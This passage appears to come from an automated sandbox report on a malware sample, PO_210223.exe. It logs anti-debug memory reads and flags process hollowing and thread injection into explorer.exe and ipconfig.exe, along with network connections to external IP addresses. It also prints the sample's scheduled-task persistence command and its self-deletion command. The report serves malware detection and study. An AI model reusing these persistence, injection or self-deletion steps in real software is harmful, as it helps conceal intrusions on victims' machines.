            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034E4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0350B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0350B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03528A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0349927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03488E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03468A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03455210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03455210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03455210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03455210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03473A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03494A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03494A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0350FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03528ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034836CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03498EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0350FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034676E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034816E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03520EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03520EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03520EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03493D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03477D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03528D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03484D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03484D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03484D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034DA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03508DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034E41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034835A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03481DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03481DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03481DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_035205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_035205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03470050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03470050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03512073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03521074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03524015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03524015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0352740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0352740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0352740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03528CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe	Process token adjusted: Debug
            Source: C:\Users\user\Desktop\PO_210223.exe	Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug
            Source: C:\Users\user\Desktop\PO_210223.exe	Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe	Network Connect: 204.11.56.48 80
            Source: C:\Windows\explorer.exe	Network Connect: 103.66.59.142 80
            Source: C:\Windows\explorer.exe	Network Connect: 23.229.197.103 80
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\PO_210223.exe	Memory written: C:\Users\user\Desktop\PO_210223.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO_210223.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PO_210223.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PO_210223.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\PO_210223.exe	Thread register set: target process: 3424
            Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3424
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\PO_210223.exe	Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\PO_210223.exe	Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: E50000
            Source: C:\Users\user\Desktop\PO_210223.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
            Source: C:\Users\user\Desktop\PO_210223.exe	Process created: C:\Users\user\Desktop\PO_210223.exe C:\Users\user\Desktop\PO_210223.exe
            Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_210223.exe'
            Source: explorer.exe, 0000000A.00000002.907526127.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
            Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
            Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmp	Binary or memory string: Progman
            Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
            Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Users\user\Desktop\PO_210223.exe VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
